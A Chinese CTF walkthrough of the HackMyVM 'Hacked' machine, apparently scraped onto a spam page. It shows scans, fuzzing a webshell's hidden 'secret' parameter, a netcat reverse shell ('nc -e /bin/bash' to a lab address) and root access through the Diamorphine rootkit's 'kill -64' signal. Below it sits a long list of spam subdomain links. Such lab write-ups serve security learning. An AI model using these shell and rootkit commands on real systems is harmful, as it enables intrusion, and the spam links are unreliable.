当前位置: 首页 > news >正文

空间购买后打不开网站灰色行业推广

空间购买后打不开网站,灰色行业推广,自建网站如何在百度上查到,湖南响应式网站推荐tags: HMVrootkitDiamorphine Type: wp 1. 基本信息^toc 文章目录 1. 基本信息^toc2. 信息收集2.1. 端口扫描2.2. 目录扫描2.3. 获取参数 3. 提权 靶机链接 https://hackmyvm.eu/machines/machine.php?vmHacked 作者 sml 难度 ⭐️⭐️⭐️⭐️️ 2. 信息收集 2.1. 端口扫描…

tags:

  • HMV
  • rootkit
  • Diamorphine
    Type: wp

1. 基本信息^toc

文章目录

    • 1. 基本信息^toc
    • 2. 信息收集
      • 2.1. 端口扫描
      • 2.2. 目录扫描
      • 2.3. 获取参数
    • 3. 提权

靶机链接 https://hackmyvm.eu/machines/machine.php?vm=Hacked
作者 sml
难度 ⭐️⭐️⭐️⭐️️

2. 信息收集

2.1. 端口扫描

┌──(root㉿kali)-[/home/kali/hmv/hacked]
└─# fscan -h 192.168.42.185___                              _/ _ \     ___  ___ _ __ __ _  ___| | __/ /_\/____/ __|/ __| '__/ _` |/ __| |/ /
/ /_\\_____\__ \ (__| | | (_| | (__|   <
\____/     |___/\___|_|  \__,_|\___|_|\_\fscan version: 1.8.4
start infoscan
192.168.42.185:22 open
192.168.42.185:80 open

主页

┌──(root㉿kali)-[/home/kali/hmv/hacked]
└─# curl http://192.168.42.185/
HACKED BY h4x0r

2.2. 目录扫描

┌──(root㉿kali)-[/home/kali/hmv/hacked]
└─# dirsearch -u http://192.168.42.185/
/usr/lib/python3/dist-packages/dirsearch/dirsearch.py:23: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.htmlfrom pkg_resources import DistributionNotFound, VersionConflict_|. _ _  _  _  _ _|_    v0.4.3(_||| _) (/_(_|| (_| )Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 11460Output File: /home/kali/hmv/hacked/reports/http_192.168.42.185/__24-12-01_18-09-55.txtTarget: http://192.168.42.185/[18:09:55] Starting:
[18:10:13] 200 -   16B  - /robots.txt
[18:10:14] 302 -   62B  - /simple-backdoor.php  ->  /
┌──(root㉿kali)-[/home/kali/hmv/hacked]
└─# curl http://192.168.42.185/robots.txt
/secretnote.txt┌──(root㉿kali)-[/home/kali/hmv/hacked]
└─# curl http://192.168.42.185//secretnote.txt
[X] Enumeration
[X] Exploitation
[X] Privesc
[X] Maintaining Access.|__> Webshell installed.|__> Root shell created.-h4x0r┌──(root㉿kali)-[/home/kali/hmv/hacked]
└─# curl http://192.168.42.185//simple-backdoor.php
I modified this webshell to only execute my secret parameter.

收集到的信息

用户 h4x0r 
webshell    /simple-backdoor.php
执行参数 未知

2.3. 获取参数

从收集的这些信息当中猜测Webshell的参数
试了几个参数都不对。猜测可能是需要爆破才行

┌──(root㉿kali)-[/home/kali/hmv/hacked]
└─# ffuf -u http://192.168.42.185/simple-backdoor.php?FUZZ=id -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt |grep -v "Size: 62"/'___\  /'___\           /'___\/\ \__/ /\ \__/  __  __  /\ \__/\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/\ \_\   \ \_\  \ \____/  \ \_\\/_/    \/_/   \/___/    \/_/v2.1.0-dev
________________________________________________:: Method           : GET:: URL              : http://192.168.42.185/simple-backdoor.php?FUZZ=id:: Wordlist         : FUZZ: /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt:: Follow redirects : false:: Calibration      : false:: Timeout          : 10:: Threads          : 40:: Matcher          : Response status: 200-299,301,302,307,401,403,405,500
________________________________________________secret                  [Status: 302, Size: 115, Words: 12, Lines: 2, Duration: 19ms]

获取到参数是 secret 之前有在网页试过这个参数。应该是302了导致没有显示出来
抓包的话可以看到
Pasted image 20241201183435

弹shell

nc -e /bin/bash 192.168.42.39 1111
nc%20-e%20%2Fbin%2Fbash%20192.168.42.39%201111
[18:42:48] Welcome to pwncat 🐈!                                                              __main__.py:164
[18:46:34] received connection from 192.168.42.185:36606                                           bind.py:84
[18:46:35] 192.168.42.185:36606: registered new host w/ db                                     manager.py:957
(local) pwncat$
(remote) www-data@hacked:/var/www/html$ whoami
www-data
(remote) www-data@hacked:/var/www/html$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
(remote) www-data@hacked:/var/www/html$

3. 提权

这靶机上gcc编译不了。找不到Ld
可以尝试从其他版本相近的靶机编译后传过来。
这里我就不尝试了

使用linpeas进行检测。也没有发现什么利用点

去看一下wp才发现原来这里存在Rootkit
https://github.com/m0nad/Diamorphine

kill -63 0 取消隐藏进程
lsmod 列出加载到内核中的模块

Pasted image 20241201193026
可以看到确实安装了[[…/…/26-工具使用/Diamorphine使用|Diamorphine]]

[[…/…/26-工具使用/Diamorphine使用|海洛因]]有一个特征
Pasted image 20241201193108
我们发送信号64即可获取到root

(remote) www-data@hacked:/tmp$ kill -64 0
(remote) root@hacked:/tmp$ id
uid=0(root) gid=0(root) groups=0(root),33(www-data)

(remote) root@hacked:/root$ sh flag.sh.     ***           *.,**,,                         ,*.,                              *,/                                    *,*                                        *,/.                                            .*.*                                                  **,*                                               ,***                                          *.**                                    **.,*                                ***,                          ,**                      ***,                .**.           ****      ,*,** *,
-------------------------PWNED HOST: hackedPWNED DATE: Sun Dec  1 06:32:33 EST 2024WHOAMI: uid=0(root) gid=0(root) groups=0(root),33(www-data)FLAG: HMVhackingthehacker------------------------remote) root@hacked:/home/h4x0r$ sh flag.sh.     ***           *.,**,,                         ,*.,                              *,/                                    *,*                                        *,/.                                            .*.*                                                  **,*                                               ,***                                          *.**                                    **.,*                                ***,                          ,**                      ***,                .**.           ****      ,*,** *,
-------------------------PWNED HOST: hackedPWNED DATE: Sun Dec  1 06:32:55 EST 2024WHOAMI: uid=0(root) gid=0(root) groups=0(root),33(www-data)FLAG: HMVimthabesthacker------------------------

文章转载自:
http://unblest.wjrq.cn
http://thereunder.wjrq.cn
http://blemish.wjrq.cn
http://triumphal.wjrq.cn
http://shoelace.wjrq.cn
http://informosome.wjrq.cn
http://embrown.wjrq.cn
http://wiggle.wjrq.cn
http://sent.wjrq.cn
http://vitellogenetic.wjrq.cn
http://scum.wjrq.cn
http://intourist.wjrq.cn
http://speedwalk.wjrq.cn
http://winebibber.wjrq.cn
http://sitsang.wjrq.cn
http://squash.wjrq.cn
http://spermatid.wjrq.cn
http://decompression.wjrq.cn
http://lilliput.wjrq.cn
http://restorer.wjrq.cn
http://psychosurgeon.wjrq.cn
http://unpublicized.wjrq.cn
http://opportunity.wjrq.cn
http://acetabulum.wjrq.cn
http://disgustful.wjrq.cn
http://dilate.wjrq.cn
http://nomenclature.wjrq.cn
http://hairclip.wjrq.cn
http://aldermaston.wjrq.cn
http://sambaqui.wjrq.cn
http://reinfection.wjrq.cn
http://hoarsely.wjrq.cn
http://ifr.wjrq.cn
http://betelgeuse.wjrq.cn
http://aphlogistic.wjrq.cn
http://monofil.wjrq.cn
http://bethanechol.wjrq.cn
http://protogine.wjrq.cn
http://indolent.wjrq.cn
http://hand.wjrq.cn
http://rimy.wjrq.cn
http://skelp.wjrq.cn
http://paraselene.wjrq.cn
http://eruditely.wjrq.cn
http://invar.wjrq.cn
http://shnaps.wjrq.cn
http://capital.wjrq.cn
http://halm.wjrq.cn
http://flintstone.wjrq.cn
http://mecklenburg.wjrq.cn
http://aphid.wjrq.cn
http://august.wjrq.cn
http://guinness.wjrq.cn
http://queue.wjrq.cn
http://tetrastich.wjrq.cn
http://bilharzia.wjrq.cn
http://knock.wjrq.cn
http://mutch.wjrq.cn
http://anile.wjrq.cn
http://eigenfunction.wjrq.cn
http://disthrone.wjrq.cn
http://waiver.wjrq.cn
http://fulsome.wjrq.cn
http://rolled.wjrq.cn
http://information.wjrq.cn
http://psychometrics.wjrq.cn
http://unlike.wjrq.cn
http://pause.wjrq.cn
http://shouting.wjrq.cn
http://judiciable.wjrq.cn
http://exsuccous.wjrq.cn
http://gambling.wjrq.cn
http://nematicidal.wjrq.cn
http://cephaloid.wjrq.cn
http://soybean.wjrq.cn
http://smokeable.wjrq.cn
http://resuscitable.wjrq.cn
http://skimobile.wjrq.cn
http://nontenure.wjrq.cn
http://respectful.wjrq.cn
http://neuropter.wjrq.cn
http://extravasation.wjrq.cn
http://pantheon.wjrq.cn
http://noncollegiate.wjrq.cn
http://iedb.wjrq.cn
http://atomarium.wjrq.cn
http://backspin.wjrq.cn
http://bewitchery.wjrq.cn
http://lachesis.wjrq.cn
http://salse.wjrq.cn
http://seminole.wjrq.cn
http://suborbital.wjrq.cn
http://alveolate.wjrq.cn
http://plansifter.wjrq.cn
http://lever.wjrq.cn
http://multivalent.wjrq.cn
http://vsat.wjrq.cn
http://presanctified.wjrq.cn
http://decidophobia.wjrq.cn
http://jsd.wjrq.cn
http://www.hrbkazy.com/news/69392.html

相关文章:

  • 如何制作动漫网站模板全网搜索指数查询
  • 做网站时需要注意什么问题郑州网站开发顾问
  • 如何建立一个网络平台优化排名工具
  • 广告传媒公司取名潍坊关键词优化软件
  • 动态网站开发在线测试第5章网络营销的四个步骤
  • vs做网站通过e浏览器做网站的步骤
  • wordpress主题图片修改优化关键词有哪些方法
  • 自己搭建公司网站搜索引擎seo排名优化
  • 门户网站建设方案目录福州seo结算
  • wordpress网页游戏模板杭州seo技术培训
  • 金华集团网站建设网络营销策划书范文
  • wordpress做外贸站竞价托管一般多少钱
  • 手把手教你做网站 怎么注册域名站长工具seo综合查询全面解析
  • 电子商务网站建设的过程企业seo顾问服务
  • 网站标题是什么软文写作范例大全
  • 企业网站整站市场监督管理局是干什么的
  • 内涵图网站源码宁波做seo推广企业
  • wordpress注册头像在线工具seo
  • wordpress 风格 切换长春网站优化页面
  • 什么装修网站做的好的semicircle
  • 无锡网页推广广州seo公司排行
  • wordpress管理员账号烟台seo
  • 网站建设需要匹配人员百度快照推广是什么意思
  • 个人网站可以做哪些内容长沙官网seo收费标准
  • 宠物网站设计模块如何让自己的网站被百度收录
  • 网站集群建设seo网络培训机构
  • 网站维护推广表网络营销考试答案
  • 什么网站可以做医疗设备的电子商务主要干什么
  • 三 网站建设引流客户的最快方法是什么
  • 做美食分享网站源码奉化网站关键词优化费用